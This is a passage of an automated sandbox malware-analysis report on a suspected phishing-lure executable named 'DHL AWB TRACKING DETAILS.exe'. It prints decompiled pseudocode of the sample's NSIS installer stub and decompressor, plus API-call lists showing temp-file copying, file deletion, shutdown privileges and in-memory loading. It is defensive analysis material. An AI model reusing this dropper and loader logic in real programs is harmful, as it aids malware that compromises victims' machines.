                    											__eflags =  *0x423f34; // 0x0
                    											if(__eflags != 0) {
                    												_t106 = E00405DA3(3);
                    												_t100 = E00405DA3(4);
                    												_t55 = E00405DA3(5);
                    												__eflags = _t106;
                    												_t97 = _t55;
                    												if(_t106 != 0) {
                    													__eflags = _t100;
                    													if(_t100 != 0) {
                    														__eflags = _t97;
                    														if(_t97 != 0) {
                    															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                    															__eflags = _t60;
                    															if(_t60 != 0) {
                    																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                    																_v416 = 1;
                    																_v404 = 2;
                    																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                    															}
                    														}
                    													}
                    												}
                    												_t56 = ExitWindowsEx(2, 0);
                    												__eflags = _t56;
                    												if(_t56 == 0) {
                    													E0040140B(9);
                    												}
                    											}
                    											_t52 =  *0x423f4c; // 0xffffffff
                    											__eflags = _t52 - 0xffffffff;
                    											if(_t52 != 0xffffffff) {
                    												_v400 = _t52;
                    											}
                    											ExitProcess(_v400);
                    										}
                    										E00405346(_v408, 0x200010);
                    										ExitProcess(2);
                    									}
                    									_t113 =  *0x423ebc; // 0x0
                    									if(_t113 == 0) {
                    										L31:
                    										 *0x423f4c =  *0x423f4c | 0xffffffff;
                    										_v400 = E004035E3();
                    										goto L32;
                    									}
                    									_t103 = E004055A3(_t96, 0);
                    									while(_t103 >= _t96) {
                    										__eflags =  *_t103 - 0x3d3f5f20;
                    										if(__eflags == 0) {
                    											break;
                    										}
                    										_t103 = _t103 - 1;
                    										__eflags = _t103;
                    									}
                    									_t115 = _t103 - _t96;
                    									_v408 = "Error launching installer";
                    									if(_t103 < _t96) {
                    										lstrcatA(_t105, "~nsu.tmp");
                    										_t101 = "C:\\Users\\engineer\\Desktop";
                    										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
                    											goto L32;
                    										}
                    										CreateDirectoryA(_t105, 0);
                    										SetCurrentDirectoryA(_t105);
                    										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                    										if(_t120 == 0) {
                    											E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t101);
                    										}
                    										E00405A85(0x424000, _v396);
                    										 *0x424400 = 0x41;
                    										_t98 = 0x1a;
                    										do {
                    											_t71 =  *0x423eb0; // 0x50f930
                    											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
                    											DeleteFileA(0x41f050);
                    											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x41f050, 1) != 0) {
                    												_push(0);
                    												_push(0x41f050);
                    												E004057D3();
                    												_t77 =  *0x423eb0; // 0x50f930
                    												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
                    												_t79 = E004052E5(0x41f050);
                    												if(_t79 != 0) {
                    													CloseHandle(_t79);
                    													_v416 = 0;
                    												}
                    											}
                    											 *0x424400 =  *0x424400 + 1;
                    											_t98 = _t98 - 1;
                    										} while (_t98 != 0);
                    										_push(0);
                    										_push(_t105);
                    										E004057D3();
                    										goto L32;
                    									}
                    									 *_t103 = 0;
                    									_t104 = _t103 + 4;
                    									if(E00405659(_t115, _t103 + 4) == 0) {
                    										goto L32;
                    									}
                    									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                    									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
                    									_v424 = 0;
                    									goto L31;
                    								}
                    								GetWindowsDirectoryA(_t105, 0x3fb);
                    								lstrcatA(_t105, "\\Temp");
                    								_t89 = E004031F1(_t110);
                    								_t111 = _t89;
                    								if(_t89 == 0) {
                    									goto L32;
                    								}
                    								goto L22;
                    							}
                    							goto L15;
                    						}
                    					} else {
                    						goto L4;
                    					}
                    					do {
                    						L4:
                    						_t44 = _t44 + 1;
                    						__eflags =  *_t44 - 0x20;
                    					} while ( *_t44 == 0x20);
                    					goto L5;
                    				}
                    				goto L20;
                    			}









































                    0x0040338a
                    0x0040338f
                    0x00403391
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403391
                    0x00000000
                    0x0040332e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004032e2
                    0x004032e2
                    0x004032e2
                    0x004032e3
                    0x004032e3
                    0x00000000
                    0x004032e2
                    0x00000000

                    APIs
                    • #17.COMCTL32 ref: 00403244
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                    • OleInitialize.OLE32(00000000), ref: 00403256
                      • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                      • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                      • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                    • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                      • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00405A92
                    • GetCommandLineA.KERNEL32(nkdpnsqeoocyepqnevm Setup,NSIS Error), ref: 00403293
                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000), ref: 004032A6
                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000020), ref: 004032D1
                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                    • DeleteFileA.KERNELBASE(1033), ref: 00403398
                    • OleUninitialize.OLE32(00000000), ref: 00403416
                    • ExitProcess.KERNEL32 ref: 00403436
                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,00000000), ref: 00403442
                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,00000000,00000000), ref: 0040344E
                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                    • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,0041F050,00000001), ref: 004034BF
                    • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                    • ExitProcess.KERNEL32 ref: 004035A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                    • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$nkdpnsqeoocyepqnevm Setup$~nsu.tmp
                    • API String ID: 2278157092-2491226936
                    • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                    • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                    • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                    • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (function 004053AA)
                    C-Code - Quality: 94%
                    			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				struct _WIN32_FIND_DATAA _v332;
                    				signed int _t37;
                    				char* _t49;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t61;
                    				signed int _t63;
                    				void* _t65;
                    				signed int _t68;
                    				CHAR* _t70;
                    				CHAR* _t72;
                    				char* _t75;
                    
                    				_t72 = _a4;
                    				_t37 = E00405659(__eflags, _t72);
                    				_v12 = _t37;
                    				if((_a8 & 0x00000008) != 0) {
                    					_t63 = DeleteFileA(_t72); // executed
                    					asm("sbb eax, eax");
                    					_t65 =  ~_t63 + 1;
                    					 *0x423f28 =  *0x423f28 + _t65;
                    					return _t65;
                    				}
                    				_t68 = _a8 & 0x00000001;
                    				__eflags = _t68;
                    				_v8 = _t68;
                    				if(_t68 == 0) {
                    					L5:
                    					E00405A85(0x4214a0, _t72);
                    					__eflags = _t68;
                    					if(_t68 == 0) {
                    						E004055BF(_t72);
                    					} else {
                    						lstrcatA(0x4214a0, "\*.*");
                    					}
                    					__eflags =  *_t72;
                    					if( *_t72 != 0) {
                    						L10:
                    						lstrcatA(_t72, 0x40900c);
                    						L11:
                    						_t70 =  &(_t72[lstrlenA(_t72)]);
                    						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                    						__eflags = _t37 - 0xffffffff;
                    						_a4 = _t37;
                    						if(_t37 == 0xffffffff) {
                    							L29:
                    							__eflags = _v8;
                    							if(_v8 != 0) {
                    								_t31 = _t70 - 1;
                    								 *_t31 =  *(_t70 - 1) & 0x00000000;
                    								__eflags =  *_t31;
                    							}
                    							goto L31;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							_t75 =  &(_v332.cFileName);
                    							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                    							__eflags =  *_t49;
                    							if( *_t49 != 0) {
                    								__eflags = _v332.cAlternateFileName;
                    								if(_v332.cAlternateFileName != 0) {
                    									_t75 =  &(_v332.cAlternateFileName);
                    								}
                    							}
                    							__eflags =  *_t75 - 0x2e;
                    							if( *_t75 != 0x2e) {
                    								L19:
                    								E00405A85(_t70, _t75);
                    								__eflags = _v332.dwFileAttributes & 0x00000010;
                    								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                    									E0040573D(_t72);
                    									_t52 = DeleteFileA(_t72);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E00404E23(0xfffffff2, _t72);
                    									} else {
                    										__eflags = _a8 & 0x00000004;
                    										if((_a8 & 0x00000004) == 0) {
                    											 *0x423f28 =  *0x423f28 + 1;
                    										} else {
                    											E00404E23(0xfffffff1, _t72);
                    											_push(0);
                    											_push(_t72);
                    											E004057D3();
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E004053AA(_t70, __eflags, _t72, _a8);
                    									}
                    								}
                    								goto L27;
                    							}
                    							_t61 =  *((intOrPtr*)(_t75 + 1));
                    							__eflags = _t61;
                    							if(_t61 == 0) {
                    								goto L27;
                    							}
                    							__eflags = _t61 - 0x2e;
                    							if(_t61 != 0x2e) {
                    								goto L19;
                    							}
                    							__eflags =  *((char*)(_t75 + 2));
                    							if( *((char*)(_t75 + 2)) == 0) {
                    								goto L27;
                    							}
                    							goto L19;
                    							L27:
                    							_t55 = FindNextFileA(_a4,  &_v332);
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t37 = FindClose(_a4);
                    						goto L29;
                    					}
                    					__eflags =  *0x4214a0 - 0x5c;
                    					if( *0x4214a0 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t37;
                    					if(_t37 == 0) {
                    						L31:
                    						__eflags = _v8;
                    						if(_v8 == 0) {
                    							L39:
                    							return _t37;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t37 = E00405D7C(_t72);
                    							__eflags = _t37;
                    							if(_t37 == 0) {
                    								goto L39;
                    							}
                    							E00405578(_t72);
                    							E0040573D(_t72);
                    							_t37 = RemoveDirectoryA(_t72);
                    							__eflags = _t37;
                    							if(_t37 != 0) {
                    								return E00404E23(0xffffffe5, _t72);
                    							}
                    							__eflags = _a8 & 0x00000004;
                    							if((_a8 & 0x00000004) == 0) {
                    								goto L33;
                    							}
                    							E00404E23(0xfffffff1, _t72);
                    							_push(0);
                    							_push(_t72);
                    							return E004057D3();
                    						}
                    						L33:
                    						 *0x423f28 =  *0x423f28 + 1;
                    						return _t37;
                    					}
                    					__eflags = _a8 & 0x00000002;
                    					if((_a8 & 0x00000002) == 0) {
                    						goto L31;
                    					}
                    					goto L5;
                    				}
                    			}

                    APIs
                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 004053C8
                    • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405412
                    • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405433
                    • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 00405439
                    • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 0040544A
                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                    • FindClose.KERNEL32(?), ref: 0040550D
                    Strings
                    • \*.*, xrefs: 0040540C
                    • "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" , xrefs: 004053B4
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                    • API String ID: 2035342205-592027580
                    • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                    • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                    • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                    • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (function 02380402)
                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023804DC
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 02380506
                    • ReadFile.KERNELBASE(00000000,00000000,02380248,?,00000000), ref: 0238051D
                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0238053F
                    • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0238019C,7FDFFF66), ref: 023805B2
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 023805BD
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0238019C), ref: 02380608
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                    • String ID:
                    • API String ID: 656311269-0
                    • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                    • Instruction ID: 9ae4c4318cc6b11de72585886b1230e18ce11506e42ed8207732b3c1ee85c1e6
                    • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                    • Instruction Fuzzy Hash: D8618F31E04314ABDB24EFA4C884BAEB7B6AF48750F148059E915FB290EB349E05CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph (function 0040604C)
                    C-Code - Quality: 98%
                    			E0040604C() {
                    				unsigned short _t531;
                    				signed int _t532;
                    				void _t533;
                    				void* _t534;
                    				signed int _t535;
                    				signed int _t565;
                    				signed int _t568;
                    				signed int _t590;
                    				signed int* _t607;
                    				void* _t614;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					if( *(_t614 - 0x40) != 0) {
                    						 *(_t614 - 0x34) = 1;
                    						 *(_t614 - 0x84) = 7;
                    						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                    						L132:
                    						 *(_t614 - 0x54) = _t607;
                    						L133:
                    						_t531 =  *_t607;
                    						_t590 = _t531 & 0x0000ffff;
                    						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                    						if( *(_t614 - 0xc) >= _t565) {
                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                    							 *(_t614 - 0x40) = 1;
                    							_t532 = _t531 - (_t531 >> 5);
                    							 *_t607 = _t532;
                    						} else {
                    							 *(_t614 - 0x10) = _t565;
                    							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                    							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                    						}
                    						if( *(_t614 - 0x10) >= 0x1000000) {
                    							L139:
                    							_t533 =  *(_t614 - 0x84);
                    							L140:
                    							 *(_t614 - 0x88) = _t533;
                    							goto L1;
                    						} else {
                    							L137:
                    							if( *(_t614 - 0x6c) == 0) {
                    								 *(_t614 - 0x88) = 5;
                    								goto L170;
                    							}
                    							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                    							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                    							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                    							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                    							goto L139;
                    						}
                    					} else {
                    						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    						__esi =  *(__ebp - 0x60);
                    						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    						__ecx =  *(__ebp - 0x3c);
                    						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    						__ecx =  *(__ebp - 4);
                    						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    						if( *(__ebp - 0x38) >= 4) {
                    							if( *(__ebp - 0x38) >= 0xa) {
                    								_t97 = __ebp - 0x38;
                    								 *_t97 =  *(__ebp - 0x38) - 6;
                    							} else {
                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    							}
                    						} else {
                    							 *(__ebp - 0x38) = 0;
                    						}
                    						if( *(__ebp - 0x34) == __edx) {
                    							__ebx = 0;
                    							__ebx = 1;
                    							L60:
                    							__eax =  *(__ebp - 0x58);
                    							__edx = __ebx + __ebx;
                    							__ecx =  *(__ebp - 0x10);
                    							__esi = __edx + __eax;
                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edi = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								_t216 = __edx + 1; // 0x1
                    								__ebx = _t216;
                    								__cx = __ax >> 5;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edi;
                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								L59:
                    								if(__ebx >= 0x100) {
                    									goto L54;
                    								}
                    								goto L60;
                    							} else {
                    								L57:
                    								if( *(__ebp - 0x6c) == 0) {
                    									 *(__ebp - 0x88) = 0xf;
                    									goto L170;
                    								}
                    								__ecx =  *(__ebp - 0x70);
                    								__eax =  *(__ebp - 0xc);
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								_t202 = __ebp - 0x70;
                    								 *_t202 =  *(__ebp - 0x70) + 1;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    								goto L59;
                    							}
                    						} else {
                    							__eax =  *(__ebp - 0x14);
                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    							if(__eax >=  *(__ebp - 0x74)) {
                    								__eax = __eax +  *(__ebp - 0x74);
                    							}
                    							__ecx =  *(__ebp - 8);
                    							__ebx = 0;
                    							__ebx = 1;
                    							__al =  *((intOrPtr*)(__eax + __ecx));
                    							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    							L40:
                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                    							__ecx =  *(__ebp - 0x58);
                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                    							 *(__ebp - 0x48) = __eax;
                    							__eax = __eax + 1;
                    							__eax = __eax << 8;
                    							__eax = __eax + __ebx;
                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                    							__ax =  *__esi;
                    							 *(__ebp - 0x54) = __esi;
                    							__edx = __ax & 0x0000ffff;
                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                    							if( *(__ebp - 0xc) >= __ecx) {
                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    								__cx = __ax;
                    								 *(__ebp - 0x40) = 1;
                    								__cx = __ax >> 5;
                    								__ebx = __ebx + __ebx + 1;
                    								 *__esi = __ax;
                    							} else {
                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                    								 *(__ebp - 0x10) = __ecx;
                    								0x800 = 0x800 - __edx;
                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                    								__ebx = __ebx + __ebx;
                    								 *__esi = __cx;
                    							}
                    							 *(__ebp - 0x44) = __ebx;
                    							if( *(__ebp - 0x10) >= 0x1000000) {
                    								L38:
                    								__eax =  *(__ebp - 0x40);
                    								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    									while(1) {
                    										if(__ebx >= 0x100) {
                    											break;
                    										}
                    										__eax =  *(__ebp - 0x58);
                    										__edx = __ebx + __ebx;
                    										__ecx =  *(__ebp - 0x10);
                    										__esi = __edx + __eax;
                    										__ecx =  *(__ebp - 0x10) >> 0xb;
                    										__ax =  *__esi;
                    										 *(__ebp - 0x54) = __esi;
                    										__edi = __ax & 0x0000ffff;
                    										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                    										if( *(__ebp - 0xc) >= __ecx) {
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                    											__cx = __ax;
                    											_t169 = __edx + 1; // 0x1
                    											__ebx = _t169;
                    											__cx = __ax >> 5;
                    											 *__esi = __ax;
                    										} else {
                    											 *(__ebp - 0x10) = __ecx;
                    											0x800 = 0x800 - __edi;
                    											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                    											__ebx = __ebx + __ebx;
                    											 *__esi = __cx;
                    										}
                    										 *(__ebp - 0x44) = __ebx;
                    										if( *(__ebp - 0x10) < 0x1000000) {
                    											L45:
                    											if( *(__ebp - 0x6c) == 0) {
                    												 *(__ebp - 0x88) = 0xe;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t155 = __ebp - 0x70;
                    											 *_t155 =  *(__ebp - 0x70) + 1;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    										}
                    									}
                    									L53:
                    									_t172 = __ebp - 0x34;
                    									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                    									L54:
                    									__al =  *(__ebp - 0x44);
                    									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                    									L55:
                    									if( *(__ebp - 0x64) == 0) {
                    										 *(__ebp - 0x88) = 0x1a;
                    										goto L170;
                    									}
                    									__ecx =  *(__ebp - 0x68);
                    									__al =  *(__ebp - 0x5c);
                    									__edx =  *(__ebp - 8);
                    									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
